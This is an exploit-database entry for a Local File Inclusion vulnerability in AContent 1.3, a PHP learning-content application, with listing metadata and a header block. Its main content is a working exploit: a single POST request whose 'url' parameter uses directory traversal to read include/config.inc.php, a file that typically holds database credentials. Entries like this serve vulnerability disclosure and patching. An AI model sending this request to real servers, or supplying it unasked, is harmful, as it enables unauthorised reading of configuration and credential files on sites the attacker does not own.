AContent 1.3 - Local File Inclusion

Author: DaOne
type: webapps
platform: php
port: 
date_added: 2013-03-22  
date_updated: 2013-03-24  
verified: 1  
codes: OSVDB-91660  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt25000/acontent.png  
application_url: http://www.exploit-db.comAContent-1.3.tar.gz  

raw file: 24869.txt  

##########################################
[~] Exploit Title: AContent 1.3 Local File Inclusion
[~] Date: 21-03-2013
[~] Author: DaOne
[~] Vendor Homepage: http://atutor.ca/acontent/
[~] Software Link: https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download
[~] Category: webapps/php
[~] Version: 1.3
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6
##########################################

# Exploit
POST http://localhost/AContent/oauth/lti/common/tool_provider_outcome.php HTTP /1.1

grade=1&key=1&secret=secret&sourcedid=1&submit=Send%20Grade&url=../../../include/config.inc.php

-end-